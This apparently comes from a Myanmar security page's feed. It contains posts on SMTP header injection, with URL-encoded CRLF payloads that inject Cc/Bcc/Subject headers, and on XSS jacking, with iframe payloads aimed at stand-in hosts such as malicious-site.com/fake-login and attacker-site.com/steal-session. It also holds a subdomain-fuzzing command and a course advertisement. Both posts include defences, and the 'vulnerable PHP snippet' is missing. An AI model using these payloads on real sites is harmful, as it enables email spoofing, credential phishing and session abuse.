DarkWeb Myanmar Knowledge


16/07/2025

📩 How Hackers Exploit SMTP Injection to Send Spoofed Email

🔍 What is SMTP Injection?

SMTP Injection (also called email header injection) is a web security vulnerability in which an application builds an email from unsanitized user input, letting an attacker inject additional email headers or, where the application talks to the mail server over SMTP itself, raw SMTP commands. This can lead to email spoofing, mass spam mailing, and in some configurations injection of SMTP commands or mail-server parameters, depending on how the application hands the message to the mail server.

---

🎯 Common Areas Where SMTP Injection Happens

SMTP Injection vulnerabilities usually occur in the following areas:

📩 Contact Us forms

📝 Feedback or support ticket forms

🧾 Newsletter subscription forms

🔑 Forgot password or email verification features

✅ Signup confirmation emails

Root Cause: These features take user input (an address, a name, a subject) and place it directly into email headers (To, From, Subject, etc.) without rejecting carriage-return and line-feed characters. Headers are separated by line breaks, so a single CR/LF inside a value ends the current header and starts a new one chosen by the attacker.

---

🧪 Real-World Example (PHP)

Here’s a vulnerable PHP snippet:



If an attacker enters the following as the email input (the %0A is a URL-encoded line feed):

user@example.com%0ACc:victim@example.com

After the request is decoded, the line feed terminates the From header and the resulting email headers become:

From: user@example.com
Cc: victim@example.com

🔓 Now the attacker controls the recipient list as well as the visible sender, and the messages leave your server carrying your domain's reputation!

---

💣 SMTP Injection Payloads

Below are common payloads used to test or exploit SMTP Injection (shown as they would be typed into a form field, URL-encoded except for the third, which shows the decoded form):

user@example.com%0ACc: victim@example.com
user@example.com%0ABcc: victim@example.com
user@example.com\r\nSubject: Injected Email
%0A%0DTo: victim@example.com%0ASubject: Hacked

These payloads carry line breaks (%0A = LF, %0D = CR) that terminate the header the input was meant for and start a new one. Try both CRLF (%0D%0A) and a bare LF, since mail parsers differ in which line endings they accept.

---

🧰 Tools for Testing

Burp Suite – Modify HTTP request with payloads

OWASP ZAP – Active scanning and fuzzing

WFuzz – Fuzz headers with SMTP payloads

Python Scripts – Using smtplib or requests for custom testing

Mailtrap.io – For safe testing without sending real emails

---

🔧 Prevention Techniques

To prevent SMTP Injection, follow these best practices:

✅ 1. Sanitize and Validate Inputs

Reject input that contains carriage return or line feed characters (\r, \n). They arrive URL-encoded as %0D and %0A, but by the time your code reads the form field they are already decoded, so check the decoded value rather than the raw query string.

Whitelist valid email formats using:

$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);

filter_var() returns false when the value is not a well-formed address (line breaks included), so test for false and refuse the request instead of passing the value on.

✅ 2. Use Secure Mailing Libraries

Use libraries or services that handle email headers automatically:

PHPMailer

SendGrid

Mailgun

SMTP2GO

✅ 3. Don't Include Raw User Input in Headers

Never insert raw user input into headers like From, Cc, Bcc, or Subject. Send from a fixed application address and put the visitor's address into Reply-To after validation; that also keeps the From domain aligned with your SPF/DKIM setup. Treat free-text fields such as the subject as single-line values and strip any line breaks before use.
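To tie the Real-World Example, the payload list and these three prevention rules together, here is an added Node.js example (not code from the original post). It models the vulnerable pattern that "From: $email" inside a PHP mail() call represents, next to a hardened builder that applies the rules above. The addresses, the form-decoding helper and the e-mail regex (a rough stand-in for PHP's FILTER_VALIDATE_EMAIL) are my own constructions.

```javascript
// Added example, not code from the original post: the vulnerable pattern that
// "From: $email" inside a PHP mail() call represents, next to a hardened builder.
// Node.js, no dependencies. Addresses, the form decoder and the e-mail regex
// (a rough stand-in for PHP's FILTER_VALIDATE_EMAIL) are my own constructions.

// Naive builder: the visitor-supplied address is concatenated straight into the
// From: header, so a CR/LF inside it terminates the header and starts a new one.
function buildHeadersNaive(fromEmail, subject) {
  return "To: support@example.com\r\n" +
         "From: " + fromEmail + "\r\n" +
         "Subject: " + subject + "\r\n";
}

// What the mail software sees: split the header block on CRLF, bare LF or bare
// CR (lenient parsers accept all three) and return [name, value] pairs.
function parseHeaders(raw) {
  return raw.split(/\r\n|\r|\n/)
    .filter(line => line.length > 0)
    .map(line => {
      const i = line.indexOf(":");
      return i === -1 ? [line, ""] : [line.slice(0, i), line.slice(i + 1).trim()];
    });
}

// Form fields arrive URL-encoded; %0A and %0D become LF and CR once the request
// is decoded, and that decoded value is what the validation has to look at.
function decodeFormField(value) {
  return decodeURIComponent(value.replace(/\+/g, " "));
}

// Hardened address check: refuse CR/LF outright, then whitelist a plain
// local@domain.tld shape. Returns the value or throws.
const EMAIL_RE = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$/;
function safeEmail(value) {
  if (/[\r\n]/.test(value)) throw new Error("header injection attempt: CR/LF in address");
  if (!EMAIL_RE.test(value)) throw new Error("invalid e-mail address");
  return value;
}

// Free-text headers such as Subject: cannot be whitelisted the same way, so
// line breaks are collapsed to a single space instead of rejected.
function safeHeaderText(value) {
  return value.replace(/[\r\n]+/g, " ");
}

// Hardened builder: From: is always the application's own address (keeps
// SPF/DKIM alignment); the visitor's address goes into Reply-To after validation.
function buildHeadersSafe(userEmail, subject) {
  return "To: support@example.com\r\n" +
         "From: noreply@example.com\r\n" +
         "Reply-To: " + safeEmail(userEmail) + "\r\n" +
         "Subject: " + safeHeaderText(subject) + "\r\n";
}

// Constructed payload, the same shape as the post's first one: LF + injected Cc:.
const PAYLOAD = "user@example.com%0ACc:victim@example.com";

function demo() {
  const decoded = decodeFormField(PAYLOAD);
  const naiveNames = parseHeaders(buildHeadersNaive(decoded, "Hello")).map(h => h[0]);
  let safeError = null;
  try { buildHeadersSafe(decoded, "Hello"); } catch (e) { safeError = e.message; }
  // A line break smuggled through the subject is folded instead of becoming a Bcc:.
  const subjectAttack = "Hi\r\nBcc: victim@example.com";
  const safeNames = parseHeaders(buildHeadersSafe("user@example.com", subjectAttack)).map(h => h[0]);
  return { naiveNames, safeError, safeNames };
}

console.log(demo());
// naiveNames: [ 'To', 'From', 'Cc', 'Subject' ]       <- injected Cc: accepted
// safeError:  'header injection attempt: CR/LF in address'
// safeNames:  [ 'To', 'From', 'Reply-To', 'Subject' ] <- Bcc: folded into Subject
```

The naive builder is the whole bug: one concatenation with no line-break check. Note that the hardened version does two different things for two kinds of field, rejecting addresses that fail the whitelist but merely flattening free text, because a subject line has no shape you can whitelist.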

---

✅ Penetration Testing Checklist

Test Case: Description

Header Injection: Inject newline characters (%0D%0A and a bare %0A) into every mail-related field and check whether additional headers are accepted
Spoofed Headers: Try injecting fake From, Cc, or Bcc headers
Payload Fuzzing: Fuzz form inputs with the common payloads above
Mass Mail Potential: Check whether multiple recipients can be injected (Cc/Bcc lists)
Response Analysis: Analyze the server response and, with a mailbox you control as the injected recipient, the headers of the mail actually received

---

🧠 Impact of SMTP Injection

✅ Email Spoofing

✅ Phishing Campaigns via Trusted Domain

✅ Mass Spamming

✅ Domain Blacklisting

✅ Loss of Reputation & Deliverability

---

📌 Real Incident:

> A bug bounty hunter found SMTP Injection in a popular retail site’s feedback form. He was able to send spoofed emails to thousands of users using their trusted domain. The company’s domain got blacklisted, and customer trust was lost — all due to a single unsanitized input field.

---

🚫 Don’t Let This Happen To You!

SMTP Injection is easy to miss, but its impact can be devastating. Always validate user inputs, use secure libraries, and never trust user-controlled data when building emails.

03/07/2025

Mobile Application Security Online Training

This is a class for anyone who wants to study the security of mobile applications, the most widely used software today, properly and from the basics. It is also a class that teaches you, until you understand it clearly, how to pentest a mobile application and how to defend it.

The things you should know when pentesting both Android and iOS will be taught practically. It is a suitable class for those who want a solid foundation in Mobile Application Security, or for those who are interested in this field and want to start learning it.

Course requirements: computer basics, and a machine with at least an i5 CPU and 8GB RAM.
The course runs for nearly 2 months; classes are every week (Sat, Sun) from 10:00 AM to 11:30 AM. It is an online Zoom live class, so you need a good Internet connection.

As a prerequisite, you must have previously attended Creatigon's Web Application course.

Course fee: 500,000 MMK
Course start date: 9 August 2025

The topics to be taught are as follows.

0x01: App Architecture & Security Fundamentals
0x02: Data Storage & Transmission Security
0x03: Reverse Engineering & Code Analysis
0x04: Mobile Application Vulnerabilities
0x05: Mobile Penetration Testing Methodology
0x06: SSL Pinning & Root Detection Bypass Techniques
0x07: Secure Development Practices
0x08: Tools & Automation
0x09: CTFs, Case Studies & Final Project
0x0A: Exam

Registration is now open.
Thank you for reading.

28/06/2025

Hi everyone! 🌟 You can support me by sending Stars - they help me earn money to keep making content you love.

Whenever you see the Stars icon, you can send me Stars!

28/06/2025

Pentesting

Fuzzing subdomains and validating them with dnsx and httpx!

Try this:
dnsx -d FUZZ.<target-domain> -w <wordlist> | httpx -sc

💡 Add -mc 200,301,302 on the httpx side to keep only hosts that answer with those status codes (-sc just prints the code next to each URL).


28/06/2025

Take a close look at how hackers get hold of your password..


28/06/2025

XSS Jacking with iFrames: A Comprehensive Guide

📜 Introduction to XSS Jacking

XSS Jacking is a web application attack that combines a Cross-Site Scripting (XSS) vulnerability with iFrames to hijack user actions. The attacker's injected script adds an iFrame to the vulnerable page and places it over the real user interface, so users interact with attacker-controlled content while the address bar still shows the trusted site. It is clickjacking with the frame inserted from inside the victim page rather than from an attacker's own page.

---

🔍 How Does XSS Jacking Work?

1. Setup: The attacker finds an XSS vulnerability on a legitimate website and uses it to inject a script that creates an iFrame inside the page.

2. Execution: The iFrame mimics legitimate functionality or is positioned over sensitive elements like login forms or buttons, so it is rendered under the trusted site's URL.

3. Goal: When the user interacts with the iFrame, their actions (e.g., submitting credentials or uploading files) go to the attacker-controlled system instead of the real site.

---

🛠️ Example XSS Jacking Attack

Scenario:
A vulnerable web application allows an attacker to inject JavaScript.

Injected Payload:

```javascript
// Full-page overlay: a frame pointing at the attacker's fake login page is
// stacked above everything else, so whatever the user types goes to malicious-site.com.
const iframe = document.createElement('iframe');
iframe.src = "https://malicious-site.com/fake-login";
iframe.style.position = "absolute";   // "fixed" would also keep it in place while scrolling
iframe.style.top = "0";
iframe.style.left = "0";
iframe.style.width = "100%";
iframe.style.height = "100%";
iframe.style.border = "none";         // no visible edge that would give the frame away
iframe.style.zIndex = "9999";         // above the real page content
document.body.appendChild(iframe);
```

Explanation:

The iFrame covers the entire viewport, displaying the attacker-controlled content under the legitimate site's address.

The user interacts with the malicious iFrame, unknowingly handing sensitive information to the attacker.

---

🎯 Advanced XSS Jacking Example

Scenario: Hijacking button clicks on a legitimate site.
The attacker injects the following payload:

```javascript
// Targeted overlay: a small, fully transparent frame is placed exactly over one
// control (here a 200x50 px area near the top-left corner), so clicks land in the frame.
const iframe = document.createElement('iframe');
iframe.src = "https://malicious-site.com";
iframe.style.position = "absolute";
iframe.style.top = "10px";
iframe.style.left = "10px";
iframe.style.width = "200px";
iframe.style.height = "50px";
iframe.style.border = "none";
iframe.style.zIndex = "9999";
iframe.style.opacity = "0"; // Makes it invisible, but it still receives the clicks
document.body.appendChild(iframe);
```

Attack Flow:

1. The transparent iFrame is positioned over a legitimate button (e.g., "Submit" or "Login"); the attacker picks the coordinates to match the target page's layout.

2. The user clicks on what they think is the legitimate button, but because the frame sits on top, the click goes to the attacker's page inside the invisible iFrame instead.

---

🧩 Payloads for XSS Jacking

1. Stealing Login Credentials (same idea as the first example without explicit positioning, so the frame is appended at the end of the page):

```javascript
const iframe = document.createElement('iframe');
iframe.src = "https://malicious-site.com/fake-login";
iframe.style.width = "100%";
iframe.style.height = "100%";
iframe.style.border = "none";
document.body.appendChild(iframe);
```

2. CSRF Exploitation via iFrame (a hidden frame makes the victim's browser request a state-changing URL with the victim's cookies; this only works for actions triggered by a plain GET without an anti-CSRF token, and with XSS in hand the attacker could equally call fetch() from the page itself):

```javascript
const iframe = document.createElement('iframe');
iframe.src = "https://victim-site.com/api/perform-action";
iframe.style.width = "0";
iframe.style.height = "0";
document.body.appendChild(iframe);
```

3. Session Hijacking (a hidden frame pointing at an attacker server; note that a cross-origin frame cannot read the parent page's cookies, so as written this only records that the victim visited. To exfiltrate a token the injected script has to place it in the URL itself, and HttpOnly cookies are out of reach of document.cookie):

```javascript
const iframe = document.createElement('iframe');
iframe.src = "https://attacker-site.com/steal-session";
iframe.style.display = "none";
document.body.appendChild(iframe);
```


---

🔒 Defending Against XSS Jacking

The root cause is the XSS, so fixing the injection point and restricting what the page may load are the real defences; the framing headers address classic clickjacking and do not stop an iFrame that a script already running in your page creates.

1. CSP (Content Security Policy):

Use frame-src to restrict which origins your page may embed and script-src (without 'unsafe-inline') to stop the injected script from running at all. frame-ancestors works in the opposite direction: it controls who may frame your page, so on its own it does nothing against an injected frame.

Content-Security-Policy: default-src 'self'; script-src 'self'; frame-src 'self'; frame-ancestors 'self';

2. Input Validation and Output Encoding:

Contextually encode untrusted data when it is written into the page; where HTML must be accepted, sanitize it with a library like DOMPurify.

3. Enable X-Frame-Options:

Add the X-Frame-Options: DENY or SAMEORIGIN header to prevent other sites from framing your page (classic clickjacking). Browsers that support frame-ancestors give it precedence; keep both for older clients. This does not stop your own page from embedding an attacker's iFrame.

4. Disable iFrame Embedding:

If your page never needs to embed frames, say so explicitly with frame-src 'none' (or child-src 'none' for older browsers), so an iFrame added by injected script is refused by the browser.

5. Anti-Clickjacking Measures:

Frame-busting JavaScript remains a fallback for your page being framed elsewhere; it can be defeated (for example by the iframe sandbox attribute) and does nothing against an injected frame inside your page:

```javascript
if (window.top !== window.self) {
window.top.location = window.self.location;
}
```
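To make the difference between the two framing directives concrete (frame-ancestors says who may frame your page, frame-src says what your page may frame, and only the latter stops a frame created by a script already running in your page), here is an added Node.js example, not code from the original post: a small Content-Security-Policy evaluator run over the policy the post suggests and a corrected one. The origins shop.example, malicious-site.com and evil.example are constructed examples, and the evaluator deliberately models only a subset of CSP (see the comments).

```javascript
// Added example, not code from the original post: a small Content-Security-Policy
// evaluator used to show which directive actually stops an iframe that an
// injected script adds to your own page. Node.js, no dependencies. The origins
// are constructed examples. Modelled: 'self', 'none', '*', scheme-source,
// host-source with an optional leading "*." and port, and the CSP Level 3
// fallback chain frame-src -> child-src -> default-src. Not modelled: nonces,
// hashes, 'unsafe-inline', path matching and the http->https 'self' upgrade rule.

function parsePolicy(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1)); // first occurrence wins
  }
  return directives;
}

function defaultPort(protocol) {
  return protocol === "https:" ? "443" : protocol === "http:" ? "80" : "";
}

// Does one source expression match the URL, for a page served from pageOrigin?
function sourceMatches(source, url, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "*") return true;
  if (s === "'self'") return url.origin === pageOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;          // scheme-source, e.g. https:
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:*]+)(?::(\d+|\*))?/); // host-source
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && url.protocol !== scheme + ":") return false;
  const h = url.hostname;
  if (wildcard ? !h.endsWith("." + host) : h !== host) return false;
  const urlPort = url.port || defaultPort(url.protocol);
  if (port && port !== "*" && urlPort !== port) return false;
  return true;
}

// Nested frames are governed by frame-src, else child-src, else default-src.
// No applicable directive at all means the browser allows the frame.
function allowsFrame(policy, frameUrl, pageOrigin) {
  const directives = parsePolicy(policy);
  const sources = ["frame-src", "child-src", "default-src"]
    .map(n => directives.get(n)).find(v => v !== undefined);
  if (sources === undefined) return true;
  const url = new URL(frameUrl);
  return sources.some(src => sourceMatches(src, url, pageOrigin));
}

// Who may frame this page is governed by frame-ancestors alone (no fallback).
function allowsAncestor(policy, ancestorOrigin, pageOrigin) {
  const sources = parsePolicy(policy).get("frame-ancestors");
  if (sources === undefined) return true;
  return sources.some(src => sourceMatches(src, new URL(ancestorOrigin), pageOrigin));
}

const PAGE = "https://shop.example";                       // the vulnerable site (constructed)
const INJECTED = "https://malicious-site.com/fake-login";  // the overlay frame from the post

// The header the post suggests: it only limits who may frame shop.example.
const POLICY_POST = "frame-ancestors 'self';";
// Corrected: frame-src refuses the injected frame, script-src (no 'unsafe-inline')
// refuses the injected script itself, frame-ancestors still covers clickjacking.
const POLICY_FIXED = "default-src 'self'; script-src 'self'; frame-src 'self'; frame-ancestors 'self';";

function demo() {
  return {
    postPolicyAllowsInjectedFrame:  allowsFrame(POLICY_POST, INJECTED, PAGE),        // true
    fixedPolicyAllowsInjectedFrame: allowsFrame(POLICY_FIXED, INJECTED, PAGE),       // false
    fixedPolicyAllowsOwnFrame:      allowsFrame(POLICY_FIXED, PAGE + "/help", PAGE), // true
    fixedPolicyLetsOthersFrameUs:   allowsAncestor(POLICY_FIXED, "https://evil.example", PAGE), // false
  };
}

console.log(demo());
```

The first two results are the point: the post's header leaves the injected frame allowed, while the corrected policy blocks it and still permits the site's own frames. The evaluator is a teaching model, not a replacement for the browser; check a production policy against a real CSP evaluator and the browser console.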


Address

Yangon
